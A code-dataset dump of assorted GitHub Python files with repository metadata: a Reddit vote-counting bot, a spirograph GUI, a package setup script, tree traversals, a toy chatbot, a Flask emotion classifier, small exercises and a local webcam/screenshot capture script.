submission:\n with open(post_template) as post_template_fd:\n template = simpletemplate.SimpleTemplate(post_template_fd.read())\n post_contents = template.render(state = self.state, target = target,\n sort_nominations = self.sort_nominations,\n time = timestamp_to_date,\n post = post,\n output_url = self.args.output_url,\n fix_case = self.fix_case,\n args = self.args)\n\n if not post:\n l.info(\"Making new post\")\n if not args.dry_run:\n submission.add_comment(post_contents)\n l.info(post_contents)\n else:\n if post.body.strip() != post_contents.strip():\n l.info(\"Updating post\")\n if not args.dry_run:\n post.edit(post_contents)\n l.info(post_contents)\n\n l.debug(\"Done updating post\")\n\n def update_log(self, filename, post, template):\n l.debug(\"Updating logfile {}\".format(filename))\n if args.dry_run:\n return\n with open(template) as template_fd:\n template = simpletemplate.SimpleTemplate(template_fd.read())\n contents = template.render(state = self.state, post = post,\n time = timestamp_to_date,\n fix_case = self.fix_case,\n args = self.args)\n with open(os.path.join(self.args.output_dir, filename), 'w') as log_fd:\n log_fd.write(contents)\n\n def load_state(self, state_filename):\n try:\n with open(state_filename) as state_fd:\n self.state = json.load(state_fd, object_hook = Tree)\n except IOError:\n pass\n\n if self.state['game_type'] and self.state['game_type'] != self.args.game_type:\n raise RuntimeError(\"Wrong game type for state! state is {}, we're running {}\".format(state['game_type'], self.args.game_type))\n\n self.state['game_type'] = self.args.game_type\n\n\n def save_state(self, state_filename):\n if not state_filename:\n return\n with open(state_filename, 'w') as state_fd:\n json.dump(self.state, state_fd, indent=2)\n\nclass NominationBot(VoteBot):\n def acknowledge_nomination(self, comment, target):\n for potential_bot_comment in all_comments(comment.replies):\n if potential_bot_comment.author.name == self.bot_username:\n #TODO: more checking here\n l.debug(\"Found old acknowledge post for {}\".format(target))\n return potential_bot_comment\n with open('nomination_ack.template') as post_template_fd:\n template = simpletemplate.SimpleTemplate(post_template_fd.read())\n post_contents = template.render(state = self.state, target = target, fix_case = self.fix_case)\n l.info(\"Acknowledging nomination for {}\".format(target))\n if args.dry_run:\n return None\n else:\n return comment.reply(post_contents)\n\n def get_nominations(self, nomination_post):\n l.debug(\"Counting nominations\")\n new_state = copy.deepcopy(self.state)\n valid_names = {x.lower() for x in self.state['alive_players']}\n #TODO: voteless does not affect nominations currently.\n nomination_state = new_state['nominations'][nomination_post.id]\n nomination_state['deadline'] = new_state['nominations_ended_at']\n nominations = nomination_state['current_nominations']\n for nomination_comment in all_comments(nomination_post.replies):\n nominee = get_nomination_from_post(nomination_comment.body_html, valid_names)\n if not nominee:\n continue\n if not nomination_comment.author:\n continue\n caster = nomination_comment.author.name.lower()\n if caster not in valid_names:\n if nomination_comment not in known_invalid_votes:\n l.info(\"{} cannot nominate ({} can)!\".format(caster, valid_names))\n known_invalid_votes.add(nomination_comment.id)\n continue\n\n if nominee in nominations:\n continue\n\n #Try to find the time the nomination was made\n timestamp = get_edited_time(nomination_comment)\n\n if self.state['nominations_ended_at'] and timestamp > self.state['nominations_ended_at']:\n continue\n\n ack = self.acknowledge_nomination(nomination_comment, nominee)\n vote_history = nomination_state.get('vote_history', [])\n if not vote_history:\n vote_history = []\n vote_history.append({\"action\": \"nominated\",\n \"by\": caster,\n \"on\": nominee,\n \"time\": timestamp})\n nomination_state['vote_history'] = vote_history\n\n nominations[nominee] = {\"by\" : caster,\n \"timestamp\": timestamp,\n \"ack_id\": ack.id,\n \"for\" : nominee}\n\n by_acks_id = {}\n\n for nominee, nomination in nominations.items():\n by_acks_id[nomination['ack_id']] = nomination\n\n for nomination_comment in all_comments(nomination_post.replies):\n for ack_comment in all_comments(nomination_comment.replies):\n if ack_comment.id in by_acks_id:\n nomination = by_acks_id[ack_comment.id]\n nominee = nomination['for']\n old_votes = copy.deepcopy(nomination_state['current_votes'][nominee])\n votes = self.get_votes(ack_comment, nominee, old_votes, self.state['nominations_ended_at'])\n nomination_state['current_votes'][nominee] = votes\n additions, removals = compare_dicts(old_votes, votes)\n vote_history = nomination_state.get('vote_history', [])\n if not vote_history:\n vote_history = []\n for voter, vote in additions.items():\n vote_history.append({\"action\" : \"vote\",\n \"lynch\" : vote['lynch'],\n \"by\" : voter,\n \"for\" : vote['for'],\n \"time\" : vote['timestamp']})\n for voter, vote in removals.items():\n timestamp = votes[voter]['timestamp'] if voter in votes else int(time.time())\n vote_history.append({\"action\" : \"unvote\",\n \"lynch\" : vote['lynch'],\n \"by\" : voter,\n \"for\" : vote['for'],\n \"time\" : timestamp})\n nomination_state['vote_history'] = vote_history\n break\n\n if new_state['nominations_ended_at']:\n new_state['counting_nominations'] = False\n self.state = new_state\n l.debug(\"Done counting nominations\")\n\n def update_state(self):\n self.process_commands()\n if self.state['nominations_url'] and self.state['counting_nominations']:\n nomination_submission, nomination_post = self.get_bot_post(self.state['nominations_url'], 'nominate')\n if nomination_post:\n self.get_nominations(nomination_post)\n self.update_log('{}_history.txt'.format(nomination_post.id),\n nomination_post, 'vote_history.template')\n self.update_log('{}_votes.txt'.format(nomination_post.id),\n nomination_post, 'nomination_state.template')\n self.update_post(nomination_submission, nomination_post, 'nomination_post.template',\n target=nomination_post.id if nomination_post else None)\n\n if self.state['votes_url'] and self.state['counting_votes']:\n for nominee in self.state['nominated_players']:\n votes_submission, votes_post = self.get_bot_post(self.state['votes_url'], 'vote ' + nominee)\n if votes_post:\n self.count_votes(votes_post, nominee)\n self.update_log('{}_history.txt'.format(votes_post.id),\n votes_post, 'vote_history.template')\n self.update_log('{}_votes.txt'.format(votes_post.id),\n votes_post, 'vote_state.template')\n self.update_post(votes_submission, votes_post, 'vote_post.template', nominee)\n if self.state['votes_ended_at']:\n self.state['counting_votes'] = False\n\n def count_votes(self, vote_post, nominee):\n l.debug(\"Counting votes\")\n new_state = copy.deepcopy(self.state)\n old_votes = self.state['votes'][vote_post.id]['current_votes']\n votes_state = new_state['votes'][vote_post.id]\n votes = self.get_votes(vote_post, nominee, old_votes, self.state['votes_ended_at'])\n\n additions, removals = compare_dicts(old_votes, votes)\n vote_history = votes_state.get('vote_history', [])\n if not vote_history:\n vote_history = []\n for voter, vote in additions.items():\n vote_history.append({\"action\" : \"vote\",\n \"lynch\" : vote['lynch'],\n \"by\" : voter,\n \"for\" : vote['for'],\n \"time\" : vote['timestamp']})\n for voter, vote in removals.items():\n timestamp = votes[voter]['timestamp'] if voter in votes else int(time.time())\n vote_history.append({\"action\" : \"unvote\",\n \"lynch\" : vote['lynch'],\n \"by\" : voter,\n \"for\" : vote['for'],\n \"time\" : timestamp})\n\n votes_state['vote_history'] = vote_history\n votes_state['current_votes'] = votes\n\n self.state = new_state\n l.debug(\"Done counting votes\")\n\n\nclass TraditionalBot(VoteBot):\n def update_state(self):\n self.process_commands()\n self.state['name_case_cache']['no lynch'] = 'No Lynch'\n if self.state['votes_url']:\n vote_submission, vote_post = self.get_bot_post(self.state['votes_url'], 'vote')\n if vote_post:\n self.count_votes(vote_post)\n self.update_log('{}_history.txt'.format(vote_post.id),\n vote_post, 'vote_history_traditional.template')\n self.update_log('{}_votes.txt'.format(vote_post.id),\n vote_post, 'vote_state_traditional.template')\n\n votes = self.state['votes'][vote_post.id]['current_votes']\n vote_counts = collections.Counter([v['lynch'] for v in votes.values()])\n real_vote_counts = collections.Counter([v['lynch'] for caster, v in votes.items()\n if caster not in self.state['voteless_players']])\n if not self.args.secret_voteless:\n vote_counts = real_vote_counts\n vote_threshold = self.state['vote_threshold']\n if not isinstance(vote_threshold, int):\n vote_threshold = (len(self.state['alive_players']) - len(self.state['voteless_players']))/ 2 + 1\n if len(vote_counts) and real_vote_counts.most_common(1)[0][1] >= vote_threshold and not self.state['votes_ended_at'] and args.hammers:\n self.state['votes_ended_at'] = time.time()\n v_url = state['votes_url']\n self.state['votes_url'] = \"\"\n lynched_player = real_vote_counts.most_common(1)[0][0]\n for user in self.authorized_users:\n if not args.dry_run:\n self.reddit.send_message(user, \"Hammer\",\n \"The voting at {} has reached \"\n \"a majority for {} . You might want to check the voting \"\n \"history and edit times if there were a few last-minute vote changes\".format(v_url, lynched_player))\n self.update_post(vote_submission, vote_post, 'vote_post_traditional.template', None)\n self.update_log('players.txt', None, 'players.template')\n\n\n def count_votes(self, vote_post):\n l.debug(\"Counting votes\")\n new_state = copy.deepcopy(self.state)\n\n old_votes = self.state['votes'][vote_post.id]['current_votes']\n votes_state = new_state['votes'][vote_post.id]\n\n valid_names = {x.lower() for x in self.state['alive_players']}\n valid_names.add('no lynch')\n\n def get_vote(post_contents):\n res = get_nomination_from_post(post_contents, valid_names)\n return res\n\n votes = self.get_votes(vote_post, None, old_votes, self.state['votes_ended_at'], get_vote = get_vote)\n\n additions, removals = compare_dicts(old_votes, votes)\n vote_history = votes_state.get('vote_history', [])\n if not vote_history:\n vote_history = []\n for voter, vote in additions.items():\n vote_history.append({\"action\" : \"vote\",\n \"for\" : vote['lynch'],\n \"by\" : voter,\n \"time\" : vote['timestamp']})\n\n for voter, vote in removals.items():\n timestamp = votes[voter]['timestamp'] if voter in votes else int(time.time())\n vote_history.append({\"action\" : \"unvote\",\n \"for\" : vote['lynch'],\n \"by\" : voter,\n \"time\" : timestamp})\n\n votes_state['vote_history'] = vote_history\n votes_state['current_votes'] = votes\n\n self.state = new_state\n l.debug(\"Done counting votes\")\n\ndef oauth_login(r):\n r.set_oauth_app_info(client_id = creds.oauth_id,\n client_secret = creds.oauth_secret,\n redirect_uri=\"http://127.0.0.1:65010/authorize_callback\")\n url = r.get_authorize_url('PloungeMafiaVoteBot', 'identity submit privatemessages edit history read', True)\n print(url)\n key = raw_input('key>').strip()\n access_info = r.get_access_information(key)\n r.set_access_credentials(**access_info)\n return access_info\n\ndef oauth_load(r):\n r.set_oauth_app_info(client_id = creds.oauth_id,\n client_secret = creds.oauth_secret,\n redirect_uri=\"http://127.0.0.1:65010/authorize_callback\")\n with open('oauth_info.json') as access_fd:\n access_info = json.load(access_fd)\n access_info['scope'] = set(access_info['scope'])\n r.set_access_credentials(**access_info)\n return access_info\n\ndef oauth_refresh(r, access_info):\n access_info = r.refresh_access_information(access_info['refresh_token'])\n r.set_access_credentials(**access_info)\n with open('oauth_info.json', 'w') as access_fd:\n json_safe_access_info = dict(access_info)\n json_safe_access_info['scope'] = list(json_safe_access_info['scope'])\n json.dump(json_safe_access_info, access_fd, indent=2)\n return access_info\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n l.setLevel(debug_levels[args.log_level])\n l.info(\"Starting up\")\n r = praw.Reddit(user_agent = \"VoteCountBot by rcxdude\")\n\n bots = []\n last_refresh_time = None\n oauth_access_info = None\n\n\n for game in config.games:\n if game.name.lower() not in [x.lower() for x in config.enabled_games]:\n continue\n\n BotClass = {\n \"nomination\" : NominationBot,\n \"traditional\" : TraditionalBot,\n }[game.game_type]\n\n bot = BotClass(r, creds, game)\n bot.load_state(bot.args.state_file)\n bot.setup_dir()\n bots.append(bot)\n\n while True:\n l.info(\"Attempting login\")\n try:\n if args.oauth_login:\n oauth_access_info = oauth_login(r)\n else:\n oauth_access_info = oauth_load(r)\n #r.login(creds.bot_username, creds.bot_password)\n break\n except Exception as e:\n l.error(traceback.format_exc())\n time.sleep(60 * args.update_delay)\n\n oauth_access_info = oauth_refresh(r, oauth_access_info)\n last_refresh_time = time.time()\n\n l.info(\"Logged in\")\n\n while True:\n for bot in bots:\n try:\n bot.update_state()\n bot.save_state(bot.args.state_file)\n except Exception as e:\n l.error(traceback.format_exc())\n if args.oneshot:\n break\n if time.time() - last_refresh_time > 40 * 60:\n l.info(\"Refreshing OAuth information\")\n oauth_access_info = oauth_refresh(r, oauth_access_info)\n last_refresh_time = time.time()\n l.debug(\"done, sleeping for {} seconds\".format(60 * args.update_delay))\n time.sleep(60 * args.update_delay)\n","repo_name":"rcxdude/plounge_votebot","sub_path":"vote_count.py","file_name":"vote_count.py","file_ext":"py","file_size_in_byte":35977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31573183073","text":"from turtle import color\nimport PySimpleGUI as sg\nfrom spirograph import Spiro\n\n\n\nGRAPH_SIZE = (500, 500)\nDATA_SIZE = (500, 500)\n\nSIZE_X = GRAPH_SIZE[0]//2\nSIZE_Y = GRAPH_SIZE[1]//2\n\ngraph = sg.Graph(GRAPH_SIZE, (0, 0), DATA_SIZE, key='-GRAPH-', background_color='white',)\n\nlayout = [[sg.Text('enter', background_color='#FCFCFC', text_color='black')],\n [sg.Text('R', size=(15, 1), background_color='#FCFCFC',justification='right', text_color='black'), sg.Input(key='R_input', size=(15, 1))],\n [sg.Text('r', size=(15, 1), background_color='#FCFCFC', justification='right', text_color='black'), sg.Input(key='r_input', size=(15, 1))],\n [sg.Text('l', size=(15, 1), background_color='#FCFCFC', justification='right', text_color='black'), sg.Input(key='l_input', size=(15, 1))],\n [sg.Button('draw')],\n [graph]]\n \nwindow = sg.Window(title=\"spirograph\", layout=layout, background_color='#FCFCFC')\n\n\nwhile True:\n \n event, values = window.read()\n # End program if user closes window or\n # presses the OK button\n if event == sg.WIN_CLOSED:\n break\n if event is None:\n break\n if event == 'draw':\n is_animated = False\n graph.erase()\n\n #draw_axis()\n spirog = Spiro(int(values['R_input']),int(values['r_input']), float(values['l_input']), SIZE_X, SIZE_Y)\n plot = spirog.draw()\n prev_x, prev_y = None, None\n for x,y in plot:\n if prev_x is not None:\n graph.draw_line((prev_x, prev_y), (x, y), color='red')\n prev_x, prev_y = x, y\n if event == sg.WIN_CLOSED:\n break\n if event is None:\n break\n\nwindow.close()\n","repo_name":"Riivka/spirograph","sub_path":"view-GUI.py","file_name":"view-GUI.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35172696457","text":"from typing import List\nimport sys\nimport os\n\nVERSION = \"1.0.0\" # Remember to mirror changes on line 2 of main CMakeLists!\nTHIS_DIR = os.path.dirname(__file__)\nROOT_PACKAGE_FOLDER = \"bindings/imgui_bundle\"\nROOT_PACKAGE_NAME = \"imgui_bundle\"\n\n\ndef get_readme():\n with open(ROOT_PACKAGE_FOLDER + \"/Readme_pypi.md\", encoding=\"utf8\") as f:\n r = f.read()\n return r\n\n\ndef _get_assets_and_demos_cpp_dirs() -> List[str]:\n r = []\n\n dir_name: str\n for dir_name, subdir_list, file_list in os.walk(ROOT_PACKAGE_FOLDER):\n\n def is_assets_dir_or_subdir():\n dir_parts = dir_name.replace(\"\\\\\", \"/\").split(\"/\")\n return (\n \"assets\" in dir_parts\n or \"demos_cpp\" in dir_parts\n or \"demos_assets\"\n or \"doc\" in dir_parts\n )\n\n if is_assets_dir_or_subdir():\n relative_dir = os.path.relpath(dir_name, ROOT_PACKAGE_FOLDER)\n r.append(relative_dir)\n\n return r\n\n\ndef get_imgui_bundle_package_data() -> List[str]:\n data = [\n \"Readme.md\",\n \"LICENSE\",\n \"py.typed\",\n \"*.pyi\",\n \"*/*.pyi\",\n \"*/py.typed\",\n \"demos_python/notebooks/*.ipynb\",\n \"demos_python/demos_node_editor/demo_node_editor_basic.json\",\n ]\n for asset_dir in _get_assets_and_demos_cpp_dirs():\n data.append(asset_dir + \"/*.*\")\n return data\n\n\ndef get_imgui_bundle_packages() -> List[str]:\n r = []\n dir_name: str\n for dir_name, subdir_list, file_list in os.walk(ROOT_PACKAGE_FOLDER):\n if os.path.isfile(dir_name + \"/__init__.py\"):\n package_dir = os.path.relpath(dir_name, ROOT_PACKAGE_FOLDER)\n if package_dir == \".\":\n package_name = ROOT_PACKAGE_NAME\n else:\n package_name = ROOT_PACKAGE_NAME + \".\" + package_dir.replace(\"/\", \".\")\n r.append(package_name)\n return r\n\n\ntry:\n from skbuild import setup\nexcept ImportError:\n print(\n \"Please update pip, you need pip 10 or greater,\\n\"\n \" or you need to install the PEP 518 requirements in pyproject.toml yourself\",\n file=sys.stderr,\n )\n raise\n\nsetup(\n name=\"imgui-bundle\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: MIT License\",\n \"Topic :: Scientific/Engineering\",\n \"Typing :: Typed\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3\",\n ],\n version=VERSION,\n author=\"Pascal Thomet\",\n author_email=\"pthomet@gmail.com\",\n description=\"Dear ImGui Bundle: easily create ImGui applications in Python and C++. Batteries included!\",\n long_description=get_readme(),\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/pthom/imgui_bundle\",\n packages=(get_imgui_bundle_packages()),\n package_dir={\"\": \"bindings\"},\n cmake_install_dir=\"bindings/imgui_bundle\",\n extras_require={\"test\": [\"pytest\"]},\n python_requires=\">=3.6\",\n package_data={\"imgui_bundle\": get_imgui_bundle_package_data()},\n install_requires=[\n \"numpy >= 1.15\",\n \"munch >= 2.0.0\",\n \"glfw > 2.5\",\n \"PyOpenGL >= 3.0\",\n \"pillow >= 9.0.0\",\n ],\n entry_points={\n \"console_scripts\": [\n \"demo_imgui_bundle=imgui_bundle.demos_python.demo_imgui_bundle:main\",\n \"imgui_bundle_demo=imgui_bundle.demos_python.demo_imgui_bundle:main\",\n ],\n },\n)\n","repo_name":"pthom/imgui_bundle","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":394,"dataset":"github-code","pt":"81"} +{"seq_id":"2351492666","text":"class TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n# inorder traversal(中序遍历): left-root-right\n# will produce an ascending order of nodes\ndef inorder(node):\n # left node recursion\n if node.left:\n inorder(node.left)\n # middle node operation here\n print(node.val)\n # right node recursion\n if node.right:\n inorder(node.right)\n\n# preorder traversal(先序遍历): root-left-right\ndef preorder(node):\n # middle node operation here\n print(node.val)\n # left node recursion\n if node.left:\n preorder(node.left)\n # right node recursion\n if node.right:\n preorder(node.right)\n\n# postorder traversal(后序遍历): left-right-root\ndef postorder(node):\n # left node recursion\n if node.left:\n postorder(node.left)\n # right node recursion\n if node.right:\n postorder(node.right)\n # middle node operation here\n print(node.val)\n\n# test\n\ntree = TreeNode(4, TreeNode(2, TreeNode(1), TreeNode(3)), TreeNode(6))\n\ninorder(tree)\npreorder(tree)\npostorder(tree)\n","repo_name":"RickyWang1020/CSDSNotes","sub_path":"Python/bst_traversal.py","file_name":"bst_traversal.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34450869756","text":"import datetime\nimport random\n\n\nprint(\"this is precious, what question do you want answered today?\")\nrestaurant= [\"deplace\", \"chicken republic\", \"tantalizers\", \"Mr. Biggs\"]\nchurch= [\"St Josephs Catholic Church\", \"RCCG\", \"Living Faith\"]\nschool = [\"fehingbole grammer school\", \"Queens college\", \"yabatech\", \"unilag\"]\nrichest = [\"Alhaji Saheed Elon Musk\", \"Ola Cubana\", \"Shenior Man\"]\nwhile True:\n question=input()\n if \"restaurant\" in question:\n print(\"the closest restaurant to this location is\", random.choice(restaurant))\n elif \"church\" in question:\n print(\"the closest church to this location is\", random.choice(church))\n elif \"school\" in question:\n print(\"the closest school to this location is\", random.choice(school))\n elif \"date\" in question:\n print(datetime.datetime.now().today())\n \n elif \"richest\" in question:\n print(\"the richest person in cohort 8 is\", random.choice(richest))\n elif \"break\" in question:\n break\n else:\n print(\"you clown!!, ask a question I understand\")","repo_name":"everybees/parsel_tongue","sub_path":"femi/chat_bot.py","file_name":"chat_bot.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"5704787317","text":"from flask import Flask, request\nfrom flask_json import FlaskJSON, JsonError, as_json\nfrom werkzeug.utils import secure_filename\nfrom transformers import AutoModelForSequenceClassification\nfrom transformers import AutoTokenizer, AutoConfig\nimport numpy as np\nimport json\nfrom scipy.special import softmax\n\napp = Flask(__name__)\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\napp.config[\"JSON_ADD_STATUS\"] = False\napp.config[\"JSON_SORT_KEYS\"] = False\nAPP_ROOT = \"./\"\napp.config[\"APPLICATION_ROOT\"] = APP_ROOT\napp.config[\"UPLOAD_FOLDER\"] = \"files/\"\n\njson_app = FlaskJSON(app)\n\nmodel_path = \"daveni/twitter-xlm-roberta-emotion-es\"\ntokenizer = AutoTokenizer.from_pretrained(model_path)\nconfig = AutoConfig.from_pretrained(model_path)\nmodel = AutoModelForSequenceClassification.from_pretrained(model_path)\n\n# Preprocess text (username and link placeholders)\ndef preprocess(text):\n new_text = []\n for t in text.split(\" \"):\n t = \"@user\" if t.startswith(\"@\") and len(t) > 1 else t\n t = \"http\" if t.startswith(\"http\") else t\n new_text.append(t)\n return \" \".join(new_text)\n\n\ndef tokenize(text):\n text = preprocess(text)\n encoded_input = tokenizer(\n text, return_tensors=\"pt\", truncation=True, max_length=512\n )\n return encoded_input\n\n\ndef predict(encoded_input):\n output = model(**encoded_input)\n scores = output[0][0].detach().numpy()\n scores = softmax(scores)\n return scores\n\n\n@as_json\n@app.route(\"/predict_json\", methods=[\"POST\"])\ndef predict_json():\n\n data = request.get_json()\n if data[\"type\"] != \"text\":\n # Standard message code for unsupported response type\n return generate_failure_response(\n status=400,\n code=\"elg.request.type.unsupported\",\n text=\"Request type {0} not supported by this service\",\n params=[data[\"type\"]],\n detail=None,\n )\n if \"content\" not in data:\n return invalid_request_error(\n None\n )\n\n content = data.get(\"content\")\n try:\n encoded_input = tokenize(content)\n size = len(encoded_input[\"input_ids\"][0])\n scores = predict(encoded_input)\n output = generate_successful_response(scores)\n return output\n except Exception as e:\n text = (\n \"Unexpected error. If your input text is too long, this may be the cause.\"\n )\n # Standard message for internal error - the real error message goes in params\n return generate_failure_response(\n status=500,\n code=\"elg.service.internalError\",\n text=\"Internal error during processing: {0}\",\n params=[text],\n detail=e.__str__(),\n )\n\ndef generate_successful_response(scores):\n ranking = np.argsort(scores)\n ranking = ranking[::-1]\n\n list_clasess = list()\n for i in range(scores.shape[0]):\n list_clasess.append(\n {\"class\": config.id2label[ranking[i]], \"score\": str(scores[ranking[i]])}\n )\n response = {\"type\": \"classification\", \"classes\": list_clasess}\n output = {\"response\": response}\n return output\n\n\n@json_app.invalid_json_error\ndef invalid_request_error(e):\n \"\"\"Generates a valid ELG \"failure\" response if the request cannot be parsed\"\"\"\n raise JsonError(\n status_=400,\n failure={\n \"errors\": [\n {\"code\": \"elg.request.invalid\", \"text\": \"Invalid request message\"}\n ]\n },\n )\n\n\ndef generate_failure_response(status, code, text, params, detail):\n error = {}\n if code:\n error[\"code\"] = code\n if text:\n error[\"text\"] = text\n if params:\n error[\"params\"] = params\n if detail:\n error[\"detail\"] = {\"message\": detail}\n\n raise JsonError(status_=status, failure={\"errors\": [error]})\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8866)\n","repo_name":"Gradiant/elg_emoevales_iberlef2021","sub_path":"serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19719257090","text":"# Summary of collections.Counter:\n# https://pymotw.com/2/collections/counter.html\n# https://gist.github.com/bradmontgomery/4717521\n\nfrom collections import Counter\n\n# Need to calculate the total sum collected from shoe sales\nsum = 0\n\n# get number of shoes (X)\nX = int(input())\n\n# Create counter of all available shoe sizes\navailable_shoes = Counter(map(int, input().split(' ')))\n\n# get number of customers (N)\nN = int(input())\n\n# Work through customer orders and calculate the sum\nfor order in range(N):\n size, price = map(int, input().split(' '))\n if available_shoes[size]:\n sum += price\n available_shoes.subtract({size: 1})\n \nprint (sum)\n","repo_name":"doyleju/HR","sub_path":"collections/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34653854464","text":"#Get user input using input(“Enter your age: ”). If user is 18 or older, give feedback: You are old enough to drive. If below 18 give feedback to wait for the missing amount of years. Output: # noqa: E501\n\n# age = int(input('Enter your age): '))\n\nage = int(30)\n\nif age >= 18: # noqa: F821\n print(\"You are old enough to drive\")\nelse:\n print(f\"You need {18 - age} more years to learn to drive.\") # noqa: F821\n\n# Compare the values of my_age and your_age using if … else. Who is older (me or you)? Use input(“Enter your age: ”) to get the age as input. You can use a nested condition to print 'year' for 1 year difference in age, 'years' for bigger differences, and a custom text if my_age = your_age. Output: # noqa: E501\n\n# my_age = int(input(\"Enter your age\"))\n# your_age = int(input(\"Enter your age\"))\n\nmy_age, your_age = int(30), int(25)\n\nif my_age > your_age:\n print(f\"My age is greater than your age for {my_age - your_age} years\")\nelif my_age < your_age:\n print(f\"Your age is greater than my age for {your_age - my_age} years\")\nelse:\n print(\"My age and your age are equal\")\n\n# Get two numbers from the user using input prompt. If a is greater than b return a is greater than b, if a is less b return a is smaller than b, else a is equal to b. Output: # noqa: E501\n\none = int(3)\ntwo = int(4)\n\nif one > two:\n print(f\"{one} is greater than {two}\")\nelif one < two:\n print(f\"{one} is smaller than {two}\")\nelse:\n print(f\"{one} is equal to {two}\")\n\n### Exercises: Level 2\n\n# Write a code which gives grade to students according to theirs scores:\n\nnote = int(45)\n\nif note >= 90 and note <= 100:\n print(\"A\")\nelif note >= 70 and note <= 89:\n print(\"B\")\nelif note >= 60 and note <=69:\n print(\"C\")\nelif note >= 50 and note <=59:\n print(\"D\")\nelse:\n print(\"F\")\n\n\nfruits = ['banana', 'orange', 'mango', 'lemon']\n# If a fruit doesn't exist in the list add the fruit to the list and print the modified list. If the fruit exists print('That fruit already exist in the list') # noqa: E501\n\n# inp = str(input(\"Ingrese o valide una fruta: \"))\n\ninp = \"Caballito\"\n\nif inp in fruits:\n print('That fruit already exist in the list')\nelse:\n fruits.append(inp)\n print(fruits)\n\n# Here we have a person dictionary. Feel free to modify it!\n\nperson = {\n 'first_name': 'Gerard',\n 'last_name': 'Bourguett',\n 'age': 30,\n 'country': 'Chile',\n 'is_married': False,\n 'skills': ['Javascript', 'HTML', 'Node', 'Python'],\n 'address': {\n 'street': 'Calle Falsa 123',\n 'zipcode': '02210'\n }\n}\n\n# * Check if the person dictionary has skills key, if so print out the middle skill in the skills list. # noqa: E501\n\nif \"skills\" in person:\n skills = person[\"skills\"]\n middle_skill = len(skills) // 2\n print('Skills: ', skills[middle_skill])\nelse:\n print(\"No hay :(\")\n\n# * Check if the person dictionary has skills key, if so check if the person has 'Python' skill and print out the result. # noqa: E501\n\nif \"skills\" in person:\n skills = person[\"skills\"]\n if \"Python\" in skills:\n print('Si tiene el esquil')\n else:\n print(\"No hay :(\")\nelse:\n print(\"Nel\")\n\n# * If a person skills has only JavaScript and React, print('He is a front end developer'), if the person skills has Node, Python, MongoDB, print('He is a backend developer'), if the person skills has React, Node and MongoDB, Print('He is a fullstack developer'), else print('unknown title') - for more accurate results more conditions can be nested! # noqa: E501\n\nif \"skills\" in person:\n skills = person['skills']\n if \"javaScript\" in skills and \"React\" in skills and len(skills) == 2:\n print(\"He is a front end developer\")\n elif \"Node\" in skills and \"Python\" in skills and \"MongoDB\" in skills:\n print(\"He is a backend developer\")\n elif \"Node\" in skills and \"React\" in skills and \"MongoDB\" in skills:\n print(\"He is a full-stack developer\")\n else:\n print(\"Unknown title\")\nelse:\n print(\"Unknown title\")\n \n\n# * If the person is married and if he lives in Chile, print the information in the following format: Asabeneh Yetayeh lives in Chile. He is married. # noqa: E501\n\nif person['country'] == \"Chile\" and person[\"is_married\"] == True:\n print(f\"{person['first_name']} {person['last_name']} lives in {person['country']}. He is married\") # noqa: E501\nelse:\n print(f\"{person['first_name']} {person['last_name']} lives in {person['country']}. He is not married\") # noqa: E501\n\n\n","repo_name":"gerardbourguett/python-autodidacta","sub_path":"day_9/condicionals.py","file_name":"condicionals.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30436394537","text":"import cv2\nfrom datetime import datetime\nimport os\nimport time\nimport pyscreenshot as ImageGrab\n\ndef auto_capture():\n while True:\n now_time = datetime.now()\n if now_time.time() < datetime(2018, 11, 8, 7, 0, 0).time():\n continue\n if now_time.time() > datetime(2018, 11, 8, 23, 0, 0).time():\n continue\n imgname_me = now_time.strftime(\"%Y%m%d_%H%M%S_me.jpg\")\n imgname_screen = now_time.strftime(\"%Y%m%d_%H%M%S_screen.jpg\")\n imgdir_me = now_time.strftime(\"/home/zhaokewei/life/images/日常/%Y%m%d/me\")\n imgdir_screen = now_time.strftime(\"/home/zhaokewei/life/images/日常/%Y%m%d/screen\")\n if not os.path.exists(imgdir_me):\n os.makedirs(imgdir_me)\n if not os.path.exists(imgdir_screen):\n os.makedirs(imgdir_screen)\n cap = cv2.VideoCapture(0)\n cap.set(3, 1920)\n cap.set(4, 1080)\n for i in range(10):\n ret, frame = cap.read()\n time.sleep(0.033)\n ret, frame = cap.read()\n if ret:\n cv2.imwrite(os.path.join(imgdir_me, imgname_me), frame)\n img_screen = ImageGrab.grab()\n img_screen.save(os.path.join(imgdir_screen, imgname_screen))\n cap.release()\n time.sleep(10 * 60)\n\n\nif __name__ == '__main__':\n auto_capture()\n","repo_name":"zhaokewei/auto_capture","sub_path":"auto_capture.py","file_name":"auto_capture.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71625051145","text":"from django.shortcuts import render, redirect\nfrom .models import Restaurant\nfrom .models import Review\nfrom django.db.models import Avg\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import RegisterForm, 